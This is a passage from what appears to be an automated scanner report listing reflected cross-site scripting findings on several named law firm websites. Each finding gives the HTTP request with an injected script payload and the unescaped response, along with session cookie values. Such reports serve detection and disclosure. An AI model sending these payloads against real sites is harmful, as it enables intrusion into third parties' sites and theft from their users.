Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="">Washington, D.C.8d254<script>alert(1)</script>39610b88ceb</a>
...[SNIP]...

2.38. http://www.fulbright.com/index.cfm [eTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?ETITLE=Washington, D.C.94895"><script>alert(1)</script>288abb3048&FUSEACTION=correspondence.emailform&SITE_ID=299&pf=y">
...[SNIP]...

2.39. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
</h2>
                                   
           I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br>
...[SNIP]...

2.40. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.site145fe"><script>alert(1)</script>aed5c335ef1&SITE_ID=299&pf=y">
...[SNIP]...

2.41. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FED44"><SCRIPT>ALERT(1)</SCRIPT>C707A822C6A=1&FUSEACTION=news.site&SITE_ID=299&pf=y">
...[SNIP]...

2.42. http://www.fulbright.com/index.cfm [pf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=home.299&PF=y660d3"><script>alert(1)</script>39aa8a72e69&pf=y">
...[SNIP]...

2.43. http://www.fulbright.com/index.cfm [rss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/
Content-Type: text/xml

<html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


        -
       


...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.allrss&RSS=y1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731&SITE_ID=286&pf=y">
...[SNIP]...

2.44. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=kqd4kregj1lis3uz4nrgoa55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9989
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]>
...[SNIP]...

2.45. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mckennacuneo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1
Host: www.mckennacuneo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:52:37 GMT
Server: Apache/2.2.15 (FreeBSD)
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15847

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta http-equiv='Content-Type' content='text/html;
...[SNIP]...
<a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'>
...[SNIP]...

2.46. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /2011insights.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...
<script type="text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

2.47. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                               <!DOCTYPE html PUB
...[SNIP]...
"text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

2.48. http://www.weil.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=h3zixcnxcv5l1a45xxonrz45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19529
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<!--
window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O
...[SNIP]...

2.49. http://www.weil.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2rtk5eyh144bhwn4mxrat4ro; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19431
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]>
...[SNIP]...

2.50. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
